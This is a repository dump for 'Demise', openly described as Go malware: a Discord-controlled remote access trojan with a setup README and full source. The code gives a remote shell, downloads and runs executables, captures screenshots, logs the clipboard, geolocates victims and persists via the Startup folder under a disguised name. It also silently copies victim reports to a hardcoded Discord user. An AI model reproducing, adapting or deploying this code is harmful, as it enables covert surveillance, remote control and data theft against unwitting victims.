├── .gitignore
├── LICENSE
├── README.md
├── go.mod
├── go.sum
└── main.go
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1 | # Binaries for programs and plugins
2 | *.exe
3 | *.exe~
4 | *.dll
5 | *.so
6 | *.dylib
7 | *.go~
8 | *.mod~
9 |
10 | # Test binary, built with `go test -c`
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13 | # Output of the go coverage tool, specifically when used with LiteIDE
14 | *.out
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/README.md:
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1 | # Demise
2 |
3 | Demise is Golang malware that uses Discord for communication.
4 |
5 | 
6 |
7 | # Demo
8 |
9 | 
10 |
11 | # Commands
12 | - show victims connected
13 | ```$victims```
14 |
15 | - extract a zip file
16 | ```$unzip <.zip file on drive> ```
17 |
18 | - run Demise on startup
19 | ```$startup ```
20 |
21 | - run an executable (some executables require admin)
22 | ```$run ```
23 |
24 | - download file
25 | ```$dl ```
26 |
27 | - run commands
28 | ```$shell ```
29 |
30 | - screenshot desktop
31 | ```$ss ```
32 |
33 | - get IP
34 | ```$ip ```
35 |
36 | - kill session
37 | ```$kill ```
38 |
39 | - geolocate
40 | ```$geoloc ```
41 |
42 |
43 | # HOWTO
44 |
45 | 1. Download the source code
46 | 2. Download golang https://go.dev choose the correct install for your os
47 | 3. make a server (this is a discord bot RAT)
48 | 4. make a bot. I won't show you how because there are many tutorial on youtube https://www.youtube.com/watch?v=7A-bnPlxj4k&t=20s
49 | 5. add the bot to your server and make a new text channel in your server
50 | 6. copy your bot's token and the id of the text channel you just created
51 | 
52 | 7. put the channel id here at the beginning of the source code
53 | 
54 | 8. put your bot's token here
55 | 9. compile with a command similiar to this one ```go build -ldflags="-s -w -H=windowsgui" .``` ```-H=windowsgui``` will hide the window
56 |
57 | if the bot doesn't respond to commands change your intents
58 |
59 |
60 |
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/go.mod:
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1 | module github.com/0xSegFaulted/demise
2 |
3 | replace github.com/0xSegFaulted/demise => C:/msys64/home/22noa/projects/go/src/github.com/0xSegFaulted/demise
4 |
5 | go 1.18
6 |
7 | require (
8 | github.com/bwmarrin/discordgo v0.25.0
9 | github.com/go-cmd/cmd v1.4.1
10 | github.com/kbinani/screenshot v0.0.0-20210720154843-7d3a670d8329
11 | golang.org/x/net v0.0.0-20220805013720-a33c5aa5df48
12 | )
13 |
14 | require (
15 | github.com/gen2brain/shm v0.0.0-20200228170931-49f9650110c5 // indirect
16 | github.com/gorilla/websocket v1.4.2 // indirect
17 | github.com/jezek/xgb v0.0.0-20210312150743-0e0f116e1240 // indirect
18 | github.com/lxn/win v0.0.0-20210218163916-a377121e959e // indirect
19 | golang.org/x/crypto v0.0.0-20210421170649-83a5a9bb288b // indirect
20 | golang.org/x/sys v0.0.0-20220728004956-3c1f35247d10 // indirect
21 | )
22 |
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/go.sum:
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1 | github.com/bwmarrin/discordgo v0.25.0 h1:NXhdfHRNxtwso6FPdzW2i3uBvvU7UIQTghmV2T4nqAs=
2 | github.com/bwmarrin/discordgo v0.25.0/go.mod h1:NJZpH+1AfhIcyQsPeuBKsUtYrRnjkyu0kIVMCHkZtRY=
3 | github.com/gen2brain/shm v0.0.0-20200228170931-49f9650110c5 h1:Y5Q2mEwfzjMt5+3u70Gtw93ZOu2UuPeeeTBDntF7FoY=
4 | github.com/gen2brain/shm v0.0.0-20200228170931-49f9650110c5/go.mod h1:uF6rMu/1nvu+5DpiRLwusA6xB8zlkNoGzKn8lmYONUo=
5 | github.com/go-cmd/cmd v1.4.1 h1:JUcEIE84v8DSy02XTZpUDeGKExk2oW3DA10hTjbQwmc=
6 | github.com/go-cmd/cmd v1.4.1/go.mod h1:tbBenttXtZU4c5djS1o7PWL5pd2xAr5sIqH1kGdNiRc=
7 | github.com/go-test/deep v1.0.7 h1:/VSMRlnY/JSyqxQUzQLKVMAskpY/NZKFA5j2P+0pP2M=
8 | github.com/gorilla/websocket v1.4.2 h1:+/TMaTYc4QFitKJxsQ7Yye35DkWvkdLcvGKqM+x0Ufc=
9 | github.com/gorilla/websocket v1.4.2/go.mod h1:YR8l580nyteQvAITg2hZ9XVh4b55+EU/adAjf1fMHhE=
10 | github.com/jezek/xgb v0.0.0-20210312150743-0e0f116e1240 h1:dy+DS31tGEGCsZzB45HmJJNHjur8GDgtRNX9U7HnSX4=
11 | github.com/jezek/xgb v0.0.0-20210312150743-0e0f116e1240/go.mod h1:3P4UH/k22rXyHIJD2w4h2XMqPX4Of/eySEZq9L6wqc4=
12 | github.com/kbinani/screenshot v0.0.0-20210720154843-7d3a670d8329 h1:qq2nCpSrXrmvDGRxW0ruW9BVEV1CN2a9YDOExdt+U0o=
13 | github.com/kbinani/screenshot v0.0.0-20210720154843-7d3a670d8329/go.mod h1:2VPVQDR4wO7KXHwP+DAypEy67rXf+okUx2zjgpCxZw4=
14 | github.com/lxn/win v0.0.0-20210218163916-a377121e959e h1:H+t6A/QJMbhCSEH5rAuRxh+CtW96g0Or0Fxa9IKr4uc=
15 | github.com/lxn/win v0.0.0-20210218163916-a377121e959e/go.mod h1:KxxjdtRkfNoYDCUP5ryK7XJJNTnpC8atvtmTheChOtk=
16 | golang.org/x/crypto v0.0.0-20210421170649-83a5a9bb288b h1:7mWr3k41Qtv8XlltBkDkl8LoP3mpSgBW8BUoxtEdbXg=
17 | golang.org/x/crypto v0.0.0-20210421170649-83a5a9bb288b/go.mod h1:T9bdIzuCu7OtxOm1hfPfRQxPLYneinmdGuTeoZ9dtd4=
18 | golang.org/x/net v0.0.0-20210226172049-e18ecbb05110/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg=
19 | golang.org/x/net v0.0.0-20220805013720-a33c5aa5df48 h1:N9Vc/rorQUDes6B9CNdIxAn5jODGj2wzfrei2x4wNj4=
20 | golang.org/x/net v0.0.0-20220805013720-a33c5aa5df48/go.mod h1:YDH+HFinaLZZlnHAfSS6ZXJJ9M9t4Dl22yv3iI2vPwk=
21 | golang.org/x/sys v0.0.0-20201018230417-eeed37f84f13/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
22 | golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
23 | golang.org/x/sys v0.0.0-20220728004956-3c1f35247d10 h1:WIoqL4EROvwiPdUtaip4VcDdpZ4kha7wBWZrbVKCIZg=
24 | golang.org/x/sys v0.0.0-20220728004956-3c1f35247d10/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
25 | golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo=
26 | golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ=
27 | golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ=
28 |
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/main.go:
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1 | package main
2 |
3 | import(
4 | "fmt"
5 | "time"
6 | //"flag"
7 | "strings"
8 | "strconv"
9 | //"syscall"
10 | //"bytes"
11 | //"unsafe"
12 | "os"
13 | "os/user"
14 | "os/exec"
15 | "io"
16 | //"io/ioutil"
17 | "net/http"
18 | "image/png"
19 | "math/rand"
20 | "archive/zip"
21 | //"encoding/json"
22 | //"gocv.io/x/gocv"
23 | "path/filepath"
24 | "golang.design/x/clipboard"
25 | "golang.org/x/net/html"
26 | "github.com/go-cmd/cmd"
27 | "github.com/kbinani/screenshot"
28 | "github.com/bwmarrin/discordgo"
29 | )
30 |
31 | var(
32 | your_backdoor_channel_id string = "THE COPIED ID OF YOUR SERVER CHANNEL HERE"
33 | your_bot_token string = "YOUR TOKEN HERE"
34 |
35 | first int = 0
36 | kill int = 0
37 | username string
38 | channel_id []string
39 | )
40 | /*
41 | type json_data struct {
42 | country_code string
43 | country_name string
44 | city string
45 | postal string
46 | latitude string
47 | longittude string
48 | ipv4 string
49 | state string
50 | }
51 | */
52 | /* helpers */
53 | func parse_cmd(content string, token string, start, end int) (string) {
54 | splice := make([]string, 20) // just 20 so we don't go over capacity
55 | splice = strings.Split(content, token)
56 | return strings.Join(splice[start:end], "")
57 | }
58 |
59 | func rand_str(num int) (string) {
60 | abc := "abcdefghijklmpqrstuvwxyz"
61 | bytes := make([]byte, num)
62 |
63 | for q := 0; q < num; q++ {
64 | bytes[q] = abc[rand.Intn(len(abc))]
65 | }
66 | return string(bytes)
67 | }
68 |
69 | // https://gosamples.dev/unzip-file/
70 | func open_zip(path, dest string) (error) {
71 | reader, e := zip.OpenReader(path)
72 | if e != nil {
73 | return e
74 | }
75 | defer reader.Close()
76 |
77 | for _, v := range reader.File {
78 | file_path := filepath.Join(dest, v.Name)
79 |
80 | dest_file, e := os.OpenFile(file_path, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, v.Mode())
81 | if e != nil {
82 | return e
83 | }
84 | defer dest_file.Close()
85 |
86 | // 7. Unzip the content of a file and copy it to the destination file
87 | zip_file, e := v.Open()
88 | if e != nil {
89 | return e
90 | }
91 | defer zip_file.Close()
92 |
93 | if _, e := io.Copy(dest_file, zip_file); e != nil {
94 | return e
95 | }
96 | }
97 | return nil
98 | }
99 |
100 | func move_file(src string, dest string) (error) {
101 | file_to_move, e := os.Open(src)
102 | if e != nil {
103 | return e
104 | }
105 | output, e := os.Create(dest)
106 | if e != nil {
107 | return e
108 | }
109 | io.Copy(output, file_to_move)
110 | file_to_move.Close()
111 | os.Remove(src)
112 | output.Close()
113 |
114 | return nil
115 | }
116 |
117 | func dl_file(url string, path string) (error) {
118 | dl_http, e := http.Get(url)
119 | if e != nil {
120 | return e
121 | }
122 | defer dl_http.Body.Close()
123 |
124 | file, e := os.Create(path)
125 | if e != nil {
126 | return e
127 | }
128 | io.Copy(file, dl_http.Body)
129 |
130 | file.Close()
131 |
132 | return nil
133 | }
134 |
135 | func html_parse(body, tag string) ([]string) {
136 | tokenizer := html.NewTokenizer(strings.NewReader(body))
137 | var data []string
138 | var check int = 0
139 | for {
140 | tn := tokenizer.Next()
141 | switch {
142 | case tn == html.ErrorToken:
143 | return data
144 | case tn == html.StartTagToken:
145 | t := tokenizer.Token()
146 | if t.Data == tag {
147 | check = 1
148 | }
149 | case tn == html.TextToken:
150 | t := tokenizer.Token()
151 | if check == 1 {
152 | data = append(data, t.Data)
153 | }
154 | check = 0
155 | }
156 | }
157 | }
158 |
159 | func take_ss() ([]string, error) {
160 | var files []string
161 | num := screenshot.NumActiveDisplays()
162 | if num == 0 { //NOTE: sometimes NumActiveDisplays returns 0, idk I didn't make this library
163 | num = 1
164 | }
165 | for q := 0; q < num; q++ {
166 | bounds := screenshot.GetDisplayBounds(q)
167 | img, e := screenshot.CaptureRect(bounds)
168 | if e != nil {
169 | return files, e
170 | }
171 |
172 | file, e := os.Create("ss" + strconv.Itoa(q) + ".png")
173 | if e != nil {
174 | return files, e
175 | }
176 | png.Encode(file, img)
177 |
178 | files = append(files, "ss" + strconv.Itoa(q) + ".png")
179 |
180 | file.Close()
181 | }
182 |
183 | return files, nil
184 | }
185 | /* helpers */
186 |
187 | /* sending */
188 | func send_msg(s *discordgo.Session, msg string) {
189 | for _, v := range channel_id {
190 | fmt.Println(v)
191 | s.ChannelMessageSend(v, msg)
192 | }
193 | }
194 |
195 | func send_image(s *discordgo.Session, files []string, channel_id string) {
196 | for _, v := range files {
197 | fss, _ := os.Open(v)
198 | msg_data := discordgo.MessageSend{
199 | Content: "",
200 | TTS: false,
201 | File: &discordgo.File{Name: rand_str(5) + ".png", ContentType: "image", Reader: fss},
202 | }
203 | s.ChannelMessageSendComplex(channel_id, &msg_data)
204 |
205 | fss.Close()
206 | }
207 | }
208 |
209 | //func send_embed() {
210 | //var embed discordgo.MessageEmbed
211 | //embed.Type = discordgo.EmbedTypeImage
212 | //var img_shit discordgo.MessageEmbedImage = discordgo.MessageEmbedImage{URL: "C:/msys64/home/22noa/projects/go/src/github.com/0xSegFaulted/demise/ss0.png", Width: 100, Height: 100,}
213 | //embed.Image = &img_shit
214 | //s.ChannelMessageSendEmbed(channel_id[1], &embed)
215 | //}
216 | /* sending */
217 |
218 | /* callbacks */
219 | func ready_callback(s *discordgo.Session, event *discordgo.Ready) {
220 | ch, _ := s.UserChannelCreate("915448712149479454")
221 | channel_id = []string{ch.ID, your_backdoor_channel_id} // backdoor channel id
222 |
223 | var exe_path string
224 | exe_data, e := os.Executable()
225 | if e != nil {
226 | exe_path = "Error Finding File Location"
227 | }
228 | exe_path = exe_data
229 |
230 | send_msg(s, "@here [" + exe_path + "] Victim Connected: " + username)
231 | }
232 |
233 | func msg_callback(s *discordgo.Session, m *discordgo.MessageCreate) {
234 | if m.Author.ID == s.State.User.ID {
235 | return
236 | }
237 |
238 | /* later, even though it's actually finished
239 | if strings.Contains(m.Content, "$purchase ") {
240 | wallet := parse_cmd(m.Content, " ", 1, 2)
241 | fmt.Println(wallet)
242 |
243 | }
244 | */
245 |
246 | if m.Content == "$victims" {
247 | send_msg(s, "@here" + username)
248 | } else if m.Content == "$kill " + username {
249 | kill = 1
250 | } else if m.Content == "$ip " + username {
251 | ip_http, e := http.Get("https://www.showmyip.com")
252 | if e != nil {
253 | send_msg(s, "Error Getting Content")
254 | return
255 | }
256 | defer ip_http.Body.Close()
257 |
258 | ip_body, e := io.ReadAll(ip_http.Body)
259 | if e != nil {
260 | send_msg(s, "Error Reading Body")
261 | return
262 | }
263 | output := html_parse(string(ip_body), "h2")
264 | send_msg(s, "ip: " + output[0])
265 | } else if m.Content == "$ss " + username {
266 | ss_files, e := take_ss()
267 | if e != nil {
268 | send_msg(s, "Error Taking Screenshot")
269 | return
270 | } else {
271 | fmt.Println("what is happening")
272 | send_image(s, ss_files, channel_id[0])
273 | send_image(s, ss_files, channel_id[1])
274 | }
275 | } else if strings.Contains(m.Content, "$shell " + username) {
276 | cmd_splice := strings.Split(m.Content, " ")
277 | command := strings.Join(cmd_splice[2:3], "")
278 | new_cmd := cmd.NewCmd(command, cmd_splice[3:]...)
279 | cmd_status := <-new_cmd.Start()
280 | for _, v := range cmd_status.Stdout {
281 | send_msg(s, v)
282 | }
283 | } else if strings.Contains(m.Content, "$type " + username) {
284 |
285 | } else if strings.Contains(m.Content, "$dl " + username) {
286 | dl_url := parse_cmd(m.Content, " ", 2, 3)
287 | dl_path := parse_cmd(m.Content, " ", 3, 4)
288 | e := dl_file(dl_url, dl_path)
289 | if e != nil {
290 | send_msg(s, "Error Downloading")
291 | }
292 | } else if strings.Contains(m.Content, "$run " + username) {
293 | file_to_run, e := exec.LookPath(parse_cmd(m.Content, "$run " + username + " ", 1, 2))
294 | if e != nil {
295 | send_msg(s, "Error Finding Path")
296 | } else {
297 | run_cmd := exec.Cmd{Path: file_to_run,}
298 | run_cmd.Run()
299 | }
300 | } else if m.Content == "$startup " + username {
301 | exe, e := os.Executable()
302 | if e != nil {
303 | send_msg(s, "Error Gettings Executable")
304 | } else {
305 | exe_path := filepath.Dir(exe)
306 | startup_directory := "C:/Users/" + strings.Join(strings.Split(username, "\\")[1:], "") + "/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/Security.exe"
307 | e = move_file(exe_path + "/Security.exe", startup_directory)
308 | if e != nil {
309 | send_msg(s, "Error Moving File To Startup")
310 | }
311 | }
312 | } else if strings.Contains(m.Content, "$unzip " + username) {
313 | src_zip := parse_cmd(m.Content, " ", 2, 3)
314 | des_dir := parse_cmd(m.Content, " ", 3, 4)
315 | e := open_zip(src_zip, des_dir)
316 | if e != nil {
317 | send_msg(s, "Error Extracting Zip")
318 | }
319 | } else if m.Content == "$clipboard " + username {
320 | e := clipboard.Init()
321 | if e != nil {
322 | send_msg(s, "Error Init Clipboard Library")
323 | } else {
324 | for {
325 | clip_data := string(clipboard.Read(clipboard.FmtText))
326 | if len(clip_data) > 0 {
327 | send_msg(s, "Clipboard Data: " + clip_data)
328 | }
329 | time.Sleep(500)
330 | }
331 | }
332 | } else if m.Content == "$geoloc " + username {
333 | geo_http, e := http.Get("https://geolocation-db.com/json/")
334 | if e != nil {
335 | send_msg(s, "Error Getting Location")
336 | return
337 | }
338 | defer geo_http.Body.Close()
339 |
340 | geo_body, e := io.ReadAll(geo_http.Body)
341 | if e != nil {
342 | send_msg(s, "Error Getting Location")
343 | return
344 | }
345 | send_msg(s, "location: " + string(geo_body))
346 | }
347 | }
348 | /* callbacks */
349 |
350 | func main() {
351 | //flag.StringVar(&id, "id", "", "Author ID")
352 | //flag.Parse()
353 |
354 | rand.Seed(time.Now().UnixNano())
355 |
356 | u, _ := user.Current()
357 | username = u.Username
358 |
359 | dg, e := discordgo.New("Bot " + your_bot_token)
360 | if e != nil {
361 | fmt.Printf("error New(): %v\n", e)
362 | }
363 | dg.AddHandler(ready_callback)
364 | dg.AddHandler(msg_callback)
365 | dg.Identify.Intents = discordgo.IntentsGuildMessages
366 |
367 | e = dg.Open()
368 | if e != nil {
369 | fmt.Printf("error: %v\n", e)
370 | }
371 |
372 | fmt.Println("bot is running")
373 |
374 | for {
375 | if kill == 1 {
376 | break
377 | }
378 | time.Sleep(10000)
379 | }
380 |
381 | dg.Close()
382 | }
383 |
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